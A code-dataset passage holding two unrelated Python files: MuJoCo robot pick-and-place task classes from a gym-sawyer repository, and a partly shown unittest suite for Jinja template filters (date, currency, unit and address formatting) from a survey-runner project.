rlagywjd802/gym-sawyer | sawyer/mujoco/tasks/transition_pick_and_place_task.py | 385bbeafcccb61afb9099554f6a99b16f1f1a7c5 | import numpy as np
from sawyer.mujoco.tasks.base import ComposableTask
class TransitionTask(ComposableTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self):
pass
def compute_reward(self, obs, info):
return 0
def is_success(self, obs, info=None, init=None):
raise NotImplementedError
def is_terminate(self, obs, init):
return self.is_success(obs, init=init)
def is_fail(self, obs):
raise NotImplementedError
def reset(self):
pass
@property
def completion_bonus(self):
return self._completion_bonus
class TransitionPickTask(TransitionTask):
"""
Task to pick up an object with the robot gripper.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.05,
object_lift_target=0.3,
completion_bonus=0):
self._success_thresh = success_thresh
self._obj_lift_target = object_lift_target
self._completion_bonus = completion_bonus
self._t = 0
def is_success(self, obs, info=None, init=None):
return True
if init:
self.reset()
goal = obs[11:14] + np.array([0, 0, 0.04])
box_pos = obs[4:7]
d = np.linalg.norm(box_pos - goal, axis=-1)
print("****[pick/is success] box_pos:{}, goal:{}, d:{}".format(box_pos, goal, d))
return d < self._success_thresh
def is_fail(self, obs):
self._t += 1
if self._t >= 1 and not self.is_success(obs):
return True
return False
def reset(self):
self._t = 0
class TransitionPlaceTask(TransitionTask):
"""
Task to place object at a desired location.
"""
def __init__(self,
success_thresh=0.015,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
print("****[place/is success] abs_diff:{}".format(abs_diff))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.21 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.03
abs_diff = abs(box_pos - goal)
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff:
return True
else:
self._prev_box_pos = box_pos
return False
def reset(self):
self._prev_box_pos = None
class TransitionPickAndPlaceTask(TransitionTask):
"""
Task to pick up an object and place the object at a desired location.
Success condition:
- Object is grasped and has been lifted above the table
"""
def __init__(self,
success_thresh=0.01,
completion_bonus=0):
self._success_thresh = success_thresh
self._completion_bonus = completion_bonus
self._prev_box_pos = None
self._picked = False
self._placing = False
def is_success(self, obs, info=None, init=None):
if init:
self.reset()
box_pos = obs[4:7]
goal = obs[11:14]
max_xy_diff = 0.02
abs_diff = abs(box_pos - goal)
print("****[pick&place/is success] abs_diff:{}, box_z:{}".format(abs_diff, box_pos[2]))
return ( abs_diff[0] < max_xy_diff and
abs_diff[1] < max_xy_diff and
box_pos[2] < 0.22 )
def is_fail(self, obs):
box_pos = obs[4:7]
goal = obs[11:14]
abs_diff = abs(box_pos - goal)
max_xy_diff = 0.03
if self._picked:
self._placing = True
print("placing True")
else:
print("placing False")
if self._picked and not self._placing:
print("return True")
return True
self._picked = True
if self._placing:
if self._prev_box_pos is None:
self._prev_box_pos = box_pos
else:
max_z_diff = 0.009
z_diff = self._prev_box_pos[2] - box_pos[2]
print("****[pick&place/is_fail] z_diff:{}, box_pos_z:{}".format(z_diff, box_pos[2]))
print(self._prev_box_pos[2], box_pos[2])
if box_pos[2] < 0.24 and (abs_diff[0] > max_xy_diff or abs_diff[1] > max_xy_diff or z_diff < max_z_diff):
print("return True")
return True
else:
self._prev_box_pos = box_pos
return False
def get_next_primitive(self, obs, prev_primitive):
if prev_primitive == -1:
return 'pick'
return 'place'
def reset(self):
self._picked = False
self._placing = False
self._prev_box_pos = None
| [((58, 12, 58, 51), 'numpy.linalg.norm', 'np.linalg.norm', (), '', True, 'import numpy as np\n'), ((56, 28, 56, 50), 'numpy.array', 'np.array', ({(56, 37, 56, 49): '[0, 0, 0.04]'}, {}), '([0, 0, 0.04])', True, 'import numpy as np\n')] |
nealedj/eq-survey-runner | tests/app/test_jinja_filters.py | b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34 | # coding: utf-8
from types import SimpleNamespace
from datetime import datetime, timedelta
from unittest.mock import patch
from dateutil.relativedelta import relativedelta
from jinja2 import Undefined, Markup
from mock import Mock
from app.jinja_filters import (
format_date, format_conditional_date, format_currency, get_currency_symbol,
format_multilined_string, format_percentage, format_date_range,
format_household_member_name, format_datetime,
format_number_to_alphabetic_letter, format_unit, format_currency_for_input,
format_number, format_unordered_list, format_unit_input_label,
format_household_member_name_possessive, concatenated_list,
calculate_years_difference, get_current_date, as_london_tz, max_value,
min_value, get_question_title, get_answer_label,
format_duration, calculate_offset_from_weekday_in_last_whole_week, format_date_custom,
format_date_range_no_repeated_month_year, format_repeating_summary, format_address_list)
from tests.app.app_context_test_case import AppContextTestCase
class TestJinjaFilters(AppContextTestCase): # pylint: disable=too-many-public-methods
def setUp(self):
self.autoescape_context = Mock(autoescape=True)
super(TestJinjaFilters, self).setUp()
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency_for_input(self):
self.assertEqual(format_currency_for_input('100', 2), '100.00')
self.assertEqual(format_currency_for_input('100.0', 2), '100.00')
self.assertEqual(format_currency_for_input('100.00', 2), '100.00')
self.assertEqual(format_currency_for_input('1000'), '1,000')
self.assertEqual(format_currency_for_input('10000'), '10,000')
self.assertEqual(format_currency_for_input('100000000'), '100,000,000')
self.assertEqual(format_currency_for_input('100000000', 2), '100,000,000.00')
self.assertEqual(format_currency_for_input(0, 2), '0.00')
self.assertEqual(format_currency_for_input(0), '0')
self.assertEqual(format_currency_for_input(''), '')
self.assertEqual(format_currency_for_input(None), '')
self.assertEqual(format_currency_for_input(Undefined()), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_get_currency_symbol(self):
self.assertEqual(get_currency_symbol('GBP'), '£')
self.assertEqual(get_currency_symbol('EUR'), '€')
self.assertEqual(get_currency_symbol('USD'), 'US$')
self.assertEqual(get_currency_symbol('JPY'), 'JP¥')
self.assertEqual(get_currency_symbol(''), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_currency(self):
self.assertEqual(format_currency(self.autoescape_context, '11', 'GBP'), "<span class='date'>£11.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '11.99', 'GBP'), "<span class='date'>£11.99</span>")
self.assertEqual(format_currency(self.autoescape_context, '11000', 'USD'), "<span class='date'>US$11,000.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, 0.00), "<span class='date'>£0.00</span>")
self.assertEqual(format_currency(self.autoescape_context, '', ), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, None), "<span class='date'></span>")
self.assertEqual(format_currency(self.autoescape_context, Undefined()), "<span class='date'></span>")
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_number(self):
self.assertEqual(format_number(123), '123')
self.assertEqual(format_number('123.4'), '123.4')
self.assertEqual(format_number('123.40'), '123.4')
self.assertEqual(format_number('1000'), '1,000')
self.assertEqual(format_number('10000'), '10,000')
self.assertEqual(format_number('100000000'), '100,000,000')
self.assertEqual(format_number(0), '0')
self.assertEqual(format_number(0.00), '0')
self.assertEqual(format_number(''), '')
self.assertEqual(format_number(None), '')
self.assertEqual(format_number(Undefined()), '')
def test_format_multilined_string_matches_carriage_return(self):
# Given
new_line = 'this is on a new\rline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_new_line(self):
# Given
new_line = 'this is on a new\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string_matches_carriage_return_new_line(self):
# Given
new_line = 'this is on a new\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(format_value, 'this is on a new<br>line')
def test_format_multilined_string(self):
# Given
new_line = 'this is\ron a\nnew\r\nline'
# When
format_value = format_multilined_string(self.autoescape_context,
new_line)
self.assertEqual(format_value, 'this is<br>on a<br>new<br>line')
def test_format_multilined_string_auto_escape(self):
# Given
new_line = '<'
# When
format_value = format_multilined_string(self.autoescape_context, new_line)
self.assertEqual(str(format_value), '<')
def test_get_current_date(self):
# Given
date_format = '%-d %B %Y'
# When
format_value = get_current_date(self.autoescape_context)
current_date = as_london_tz(datetime.utcnow()).strftime(date_format)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=current_date))
def test_format_date(self):
# Given
date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_date_month_year(self):
# Given
date = '2017-01'
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_markup(self):
# Given
date = [Markup('2017-01')]
# When
with self.app_request_context('/'):
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, "<span class='date'>January 2017</span>")
def test_format_date_non_string(self):
# Given
date = 123
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertEqual(format_value, 123)
def test_format_date_none(self):
# Given
date = None
# When
format_value = format_date(self.autoescape_context, date)
# Then
self.assertIsNone(format_value)
def test_format_date_time_in_bst(self):
# Given
date_time = '2018-03-29T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>29 March 2018 at 12:59</span>")
def test_format_date_time_in_gmt(self):
# Given
date_time = '2018-10-28T11:59:13.528680'
# When
with self.app_request_context('/'):
format_value = format_datetime(self.autoescape_context, date_time)
# Then
self.assertEqual(format_value, "<span class='date'>28 October 2018 at 11:59</span>")
def test_format_conditional_date_not_date(self):
# Given no test for integers this check was removed from jinja_filters
invalid_input = [('1', None),
('1-1-1', None)]
# When
for nonsense in invalid_input:
date1 = nonsense[0]
date2 = nonsense[1]
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertIn("does not match format '%Y-%m'", str(exception.exception))
def test_format_conditional_date_not_set(self):
# Given
# When
with self.assertRaises(Exception) as exception:
format_conditional_date(self.autoescape_context, None, None)
# Then
self.assertIn('No valid dates passed to format_conditional_dates filter', str(exception.exception))
def test_format_conditional_date(self):
# Given
datelist = [('2016-01-12', '2016-02-12', '12 January 2016'),
('2017-12-23', None, '23 December 2017'),
(None, '2017-12-24', '24 December 2017')]
# When
with self.app_request_context('/'):
for triple in datelist:
date1 = triple[0]
date2 = triple[1]
format_value = format_conditional_date(self.autoescape_context, date1, date2)
# Then
self.assertEqual(format_value, "<span class='date'>{date}</span>".format(date=triple[2]))
def test_calculate_years_difference(self):
with patch('app.setup.get_session_store', return_value=None):
# Given
ten_years_ago = (datetime.today()+relativedelta(years=-10)).strftime('%Y-%m-%d')
date_list = [('2017-01-30', '2018-01-30', '1 year'),
('2015-02-02', '2018-02-01', '2 years'),
('2016-02-29', '2017-02-28', '1 year'),
('2016-02-29', '2020-02-28', '3 years'),
(ten_years_ago, 'now', '10 years')]
for dates in date_list:
start_date = dates[0]
end_date = dates[1]
# When
calculated_value = calculate_years_difference(start_date, end_date)
# Then
self.assertEqual(calculated_value, dates[2])
def test_calculate_years_difference_none(self):
# Given
with self.assertRaises(Exception) as e:
# When
calculate_years_difference(None, '2017-01-17')
# Then
self.assertEqual('Valid date(s) not passed to calculate_years_difference filter', str(e.exception))
def test_format_date_range(self):
# Given
start_date = '2017-01-01'
end_date = '2017-01-31'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date, end_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span> to <span class='date'>31 January 2017</span>")
def test_format_date_range_missing_end_date(self):
# Given
start_date = '2017-01-01'
# When
with self.app_request_context('/'):
format_value = format_date_range(self.autoescape_context, start_date)
# Then
self.assertEqual(format_value, "<span class='date'>1 January 2017</span>")
def test_format_household_member_name(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_no_surname(self):
# Given
name = ['John', '']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_surname_is_none(self):
# Given
name = ['John', None]
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John')
def test_format_household_member_name_no_first_name(self):
# Given
name = ['', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_name_is_none(self):
# Given
name = [None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'Doe')
def test_format_household_member_name_first_middle_and_last(self):
# Given
name = ['John', 'J', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John J Doe')
def test_format_household_member_name_no_middle_name(self):
# Given
name = ['John', '', 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_middle_name_is_none(self):
# Given
name = ['John', None, 'Doe']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_trim_spaces(self):
# Given
name = ['John ', ' Doe ']
# When
format_value = format_household_member_name(name)
self.assertEqual(format_value, 'John Doe')
def test_format_household_member_name_possessive(self):
# Given
name = ['John', 'Doe']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, 'John Doe\u2019s')
def test_format_household_member_name_possessive_with_no_names(self):
# Given
name = [Undefined(), Undefined()]
# When
format_value = format_household_member_name_possessive(name)
self.assertIsNone(format_value)
def test_format_household_member_name_possessive_trailing_s(self):
# Given
name = ['John', 'Does']
# When
format_value = format_household_member_name_possessive(name)
self.assertEqual(format_value, 'John Does\u2019')
def test_concatenated_list(self):
# Given
list_items = ['1 The ONS', 'Newport', 'NP108XG']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_concatenated_list_one_entry(self):
# Given
list_items = ['One entry']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, 'One entry')
def test_concatenated_list_trim_white_spaces_and_trailing_commas(self):
# Given
list_items = ['', '1 The ONS ', 'Newport ', ' NP108XG', '']
# When
format_value = concatenated_list(list_items)
self.assertEqual(format_value, '1 The ONS, Newport, NP108XG')
def test_format_percentage(self):
self.assertEqual(format_percentage('100'), '100%')
self.assertEqual(format_percentage(100), '100%')
self.assertEqual(format_percentage(4.5), '4.5%')
def test_format_number_to_alphabetic_letter(self):
self.assertEqual(format_number_to_alphabetic_letter(0), 'a')
self.assertEqual(format_number_to_alphabetic_letter(4), 'e')
self.assertEqual(format_number_to_alphabetic_letter(25), 'z')
self.assertEqual(format_number_to_alphabetic_letter(-1), '')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit(self):
self.assertEqual(format_unit('length-meter', 100), '100 m')
self.assertEqual(format_unit('length-centimeter', 100), '100 cm')
self.assertEqual(format_unit('length-mile', 100), '100 mi')
self.assertEqual(format_unit('length-kilometer', 100), '100 km')
self.assertEqual(format_unit('area-square-meter', 100), '100 m²')
self.assertEqual(format_unit('area-square-centimeter', 100), '100 cm²')
self.assertEqual(format_unit('area-square-kilometer', 100), '100 km²')
self.assertEqual(format_unit('area-square-mile', 100), '100 sq mi')
self.assertEqual(format_unit('area-hectare', 100), '100 ha')
self.assertEqual(format_unit('area-acre', 100), '100 ac')
self.assertEqual(format_unit('volume-cubic-meter', 100), '100 m³')
self.assertEqual(format_unit('volume-cubic-centimeter', 100), '100 cm³')
self.assertEqual(format_unit('volume-liter', 100), '100 l')
self.assertEqual(format_unit('volume-hectoliter', 100), '100 hl')
self.assertEqual(format_unit('volume-megaliter', 100), '100 Ml')
self.assertEqual(format_unit('duration-hour', 100), '100 hrs')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 hours')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_welsh(self):
self.assertEqual(format_unit('duration-hour', 100), '100 awr')
self.assertEqual(format_unit('duration-year', 100), '100 bl')
self.assertEqual(format_unit('duration-hour', 100, 'long'), '100 awr')
self.assertEqual(format_unit('duration-year', 100, 'long'), '100 mlynedd')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
def test_format_unit_input_label(self):
self.assertEqual(format_unit_input_label('length-meter'), 'm')
self.assertEqual(format_unit_input_label('length-centimeter'), 'cm')
self.assertEqual(format_unit_input_label('length-mile'), 'mi')
self.assertEqual(format_unit_input_label('length-kilometer'), 'km')
self.assertEqual(format_unit_input_label('area-square-meter'), 'm²')
self.assertEqual(format_unit_input_label('area-square-centimeter'), 'cm²')
self.assertEqual(format_unit_input_label('area-square-kilometer'), 'km²')
self.assertEqual(format_unit_input_label('area-square-mile'), 'sq mi')
self.assertEqual(format_unit_input_label('area-hectare'), 'ha')
self.assertEqual(format_unit_input_label('area-acre'), 'ac')
self.assertEqual(format_unit_input_label('volume-cubic-meter'), 'm³')
self.assertEqual(format_unit_input_label('volume-cubic-centimeter'), 'cm³')
self.assertEqual(format_unit_input_label('volume-liter'), 'l')
self.assertEqual(format_unit_input_label('volume-hectoliter'), 'hl')
self.assertEqual(format_unit_input_label('volume-megaliter'), 'Ml')
self.assertEqual(format_unit_input_label('duration-hour'), 'hr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'hours')
self.assertEqual(format_unit_input_label('duration-year'), 'yr')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'years')
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='cy'))
def test_format_unit_input_label_welsh(self):
self.assertEqual(format_unit_input_label('duration-hour'), 'awr')
self.assertEqual(format_unit_input_label('duration-hour', 'long'), 'awr')
self.assertEqual(format_unit_input_label('duration-year'), 'bl')
self.assertEqual(format_unit_input_label('duration-year', 'long'), 'flynedd')
def test_format_year_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5, 'months': 4}), '5 years 4 months')
self.assertEqual(format_duration({'years': 5, 'months': 0}), '5 years')
self.assertEqual(format_duration({'years': 0, 'months': 4}), '4 months')
self.assertEqual(format_duration({'years': 1, 'months': 1}), '1 year 1 month')
self.assertEqual(format_duration({'years': 0, 'months': 0}), '0 months')
def test_format_year_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'years': 5}), '5 years')
self.assertEqual(format_duration({'years': 1}), '1 year')
self.assertEqual(format_duration({'years': 0}), '0 years')
def test_format_month_duration(self):
with self.app_request_context('/'):
self.assertEqual(format_duration({'months': 5}), '5 months')
self.assertEqual(format_duration({'months': 1}), '1 month')
self.assertEqual(format_duration({'months': 0}), '0 months')
def test_format_unordered_list(self):
list_items = [['item 1', 'item 2']]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
expected_value = '<ul><li>item 1</li><li>item 2</li></ul>'
self.assertEqual(expected_value, formatted_value)
def test_format_unordered_list_with_no_input(self):
list_items = []
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_format_unordered_list_with_empty_list(self):
list_items = [[]]
formatted_value = format_unordered_list(self.autoescape_context, list_items)
self.assertEqual('', formatted_value)
def test_max_value(self):
# Given
two_ints = (1, 2)
# When
max_of_two = max_value(*two_ints)
# Then
self.assertEqual(max_of_two, 2)
def test_max_value_none(self):
# Given
one_int = (1, None)
# When
max_of_two = max_value(*one_int)
# Then
self.assertEqual(max_of_two, 1)
def test_max_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_max_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
max_value(*args)
# Then
self.assertIn(
"Cannot determine maximum of incompatible types max(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_max_values_compatible(self):
# Given
args = (-1, True)
# When
max_of_two = max_value(*args)
# Then
self.assertEqual(max_of_two, True)
def test_max_value_str(self):
# Given
two_str = ('a', 'abc')
# When
max_of_two = max_value(*two_str)
# Then
self.assertEqual(max_of_two, 'abc')
def test_max_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
max_of_two = max_value(*two_dates)
# Then
self.assertEqual(max_of_two, now)
def test_min_value(self):
# Given
two_ints = (1, 2)
# When
min_of_two = min_value(*two_ints)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_none(self):
# Given
one_int = (1, None)
# When
min_of_two = min_value(*one_int)
# Then
self.assertEqual(min_of_two, 1)
def test_min_value_undefined(self):
# Given
args = ('foo', Undefined())
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'str'>,"
" <class 'jinja2.runtime.Undefined'>)", str(exception.exception))
def test_min_values_incompatible(self):
# Given
args = (1, 'abc')
# When
with self.assertRaises(Exception) as exception:
min_value(*args)
# Then
self.assertIn(
"Cannot determine minimum of incompatible types min(<class 'int'>,"
" <class 'str'>)", str(exception.exception))
def test_min_values_compatible(self):
# Given
args = (-1, True)
# When
min_of_two = min_value(*args)
# Then
self.assertEqual(min_of_two, -1)
def test_min_value_str(self):
# Given
two_str = ('a', 'abc')
# When
min_of_two = min_value(*two_str)
# Then
self.assertEqual(min_of_two, 'a')
def test_min_value_date(self):
# Given
now = datetime.utcnow()
then = now - timedelta(seconds=60)
two_dates = (then, now)
# When
min_of_two = min_value(*two_dates)
# Then
self.assertEqual(min_of_two, then)
def test_get_question_title_with_title_value(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title'
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'question_title')
def test_get_question_title_with_question_titles(self):
# Given
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question'
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
title = get_question_title(context, question_id)
# Then
self.assertEqual(title, 'default_question_title')
def test_get_answer_label_with_answer_label(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer',
'label': 'answer_label'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'answer_label')
def test_get_answer_label_with_no_answer_label_and_title(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'title': 'question_title',
'answers': [{
'id': 'answer'
}]
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'question_title')
def test_get_answer_label_with_no_answer_label_and_question_titles(self):
# Given
answer_id = 'answer'
question_id = 'question'
context = SimpleNamespace(
parent={
'question': {
'id': 'question',
'answers': [{
'id': 'answer'
}]
},
'content': {
'question_titles': {
'question': 'default_question_title'
}
}
}
)
# When
answer_label = get_answer_label(context, answer_id, question_id)
# Then
self.assertEqual(answer_label, 'default_question_title')
def test_offset_date_from_day(self):
test_cases = [
# (Input Date, offset, day of week, expected output)
('2018-08-10', {}, 'SU', '2018-08-05'), # Friday outputs previous Sunday
('2018-08-05', {}, 'SU', '2018-07-29'), # Sunday outputs previous Sunday (Must be a full Sunday)
('2018-08-06', {}, 'SU', '2018-08-05'), # Monday outputs previous Sunday
('2018-08-06', {'days': -1}, 'SU', '2018-08-04'), # Previous sunday with -1 day offset
('2018-08-05', {'weeks': 1}, 'SU', '2018-08-05'), # Previous sunday with +1 month offset, back to input
('2018-08-10', {}, 'FR', '2018-08-03'), # Friday outputs previous Friday
('2018-08-10T13:32:20.365665', {}, 'FR', '2018-08-03'), # Ensure we can handle datetime input
('2018-08-10', {'weeks': 4}, 'FR', '2018-08-31'), # Friday outputs previous Friday + 4 weeks
('2018-08-10', {'bad_period': 4}, 'FR', '2018-08-03'), # Friday outputs previous Friday + nothing
('2018-08-10', {'years': 1}, 'FR', '2019-08-03'), # Friday outputs previous Friday + 1 year
('2018-08-10', {'years': 1, 'weeks': 1, 'days': 1}, 'FR', '2019-08-11'), # Friday outputs previous Friday + 1 year + 1 week + 1 day
]
for case in test_cases:
self.assertEqual(calculate_offset_from_weekday_in_last_whole_week(*case[0:3]), case[3])
def test_bad_day_of_week_offset_date_from_day(self):
with self.assertRaises(Exception):
calculate_offset_from_weekday_in_last_whole_week('2018-08-10', {}, 'BA')
def test_offset_date_defaults_to_now_if_date_not_passed(self):
with patch('app.jinja_filters.datetime') as mock_datetime:
# pylint: disable=unnecessary-lambda
mock_datetime.utcnow.return_value = datetime(2018, 8, 10)
mock_datetime.strftime.side_effect = lambda *args, **kw: datetime.strftime(*args, **kw)
result = calculate_offset_from_weekday_in_last_whole_week(None, {}, 'SU')
self.assertEqual(result, '2018-08-05')
def test_format_date_custom(self):
test_cases = [
# Input Date, date format, show year
('2018-08-14', 'EEEE d MMMM YYYY', 'Tuesday 14 August 2018'),
('2018-08-14', 'EEEE d MMMM', 'Tuesday 14 August'),
('2018-08-14', 'EEEE d', 'Tuesday 14'),
('2018-08-14', 'd MMMM YYYY', '14 August 2018'),
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_custom(self.autoescape_context, *case[0:2]),
"<span class='date'>{}</span>".format(case[2])
)
def test_format_date_range_no_repeated_month_year(self):
test_cases = [
# Start Date, End Date, Date Format, Output Expected First, Output Expected Second
('2018-08-14', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 14', 'Thursday 16 August 2018'),
('2018-07-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Tuesday 31 July', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'EEEE d MMMM YYYY', 'Sunday 31 December 2017', 'Thursday 16 August 2018'),
('2017-12-31', '2018-08-16', 'MMMM YYYY', 'December 2017', 'August 2018'),
('2018-08-14', '2018-08-16', 'MMMM YYYY', 'August 2018', 'August 2018'),
('2017-12-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2017-07-31', '2018-08-16', 'YYYY', '2017', '2018'),
('2018-08-14', '2018-08-16', 'EEEE d', 'Tuesday 14', 'Thursday 16')
]
with self.app_request_context('/'):
for case in test_cases:
self.assertEqual(
format_date_range_no_repeated_month_year(self.autoescape_context, *case[0:3]),
"<span class='date'>{}</span> to <span class='date'>{}</span>".format(case[3], case[4])
)
@patch('app.jinja_filters.format_unordered_list')
def test_format_repeated_summaries_unformatted(self, patched_format): # pylint: disable=no-self-use
test_cases = [
# (input list, expected output)
([['John', 'Smith'], [['Jane', 'Sarah'], ['Smith', 'Smythe']]], ['John Smith', 'Jane Smith', 'Sarah Smythe']),
([['John', 'Smith']], ['John Smith']),
([['John', 'Smith'], ['Andy', 'Smith'], ['David', 'Smith']], ['John Smith', 'Andy Smith', 'David Smith']),
([[['Jane', 'Sarah'], ['Smith', 'Smith']]], ['Jane Smith', 'Sarah Smith']),
([[['David', 'Sarah'], ['Smith', 'Smith']]], ['David Smith', 'Sarah Smith']),
([[['David', 'Sarah'], ['', 'Smith']]], ['David', 'Sarah Smith']),
([['John', 'Smith'], [[], []]], ['John Smith'])
]
for case in test_cases:
format_repeating_summary(None, case[0])
# Format unordered list takes a list of lists
patched_format.assert_called_with(None, [[Markup(x) for x in case[1]]])
def test_format_repeated_summaries_no_input(self):
self.assertEqual('', format_repeating_summary(None, []))
def test_format_repeated_summaries_delimiters(self):
self.autoescape_context = Mock(autoescape=True)
output = format_repeating_summary(self.autoescape_context, [['', '51 Testing Gardens', '', 'Bristol', 'BS9 1AW']], delimiter=', ')
self.assertEqual(output, '<ul><li>51 Testing Gardens, Bristol, BS9 1AW</li></ul>')
def test_format_address_list_undefined_values(self):
user_entered_address = [Undefined(), Undefined(), Undefined(), Undefined(), Undefined()]
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_missing_values(self):
user_entered_address = ['44', 'Testing', '', 'Swansea', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('44<br />Testing<br />Swansea',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_None_value(self):
user_entered_address = [None, None, None, None, None]
metadata_address = [None, None, None, None, None]
with self.assertRaises(Exception):
format_address_list(user_entered_address, metadata_address)
def test_format_address_list_no_values_in_answer(self):
user_entered_address = ['', '', '', '', '']
metadata_address = ['123', 'Testy', 'Place', 'Newport', 'NP5 7AR']
self.assertEqual('123<br />Testy<br />Place<br />Newport<br />NP5 7AR',
format_address_list(user_entered_address, metadata_address))
def test_format_address_list_no_metadata(self):
user_entered_address = ['44', 'Testing', 'Gardens', 'Swansea', 'SA1 1AA']
metadata_address = []
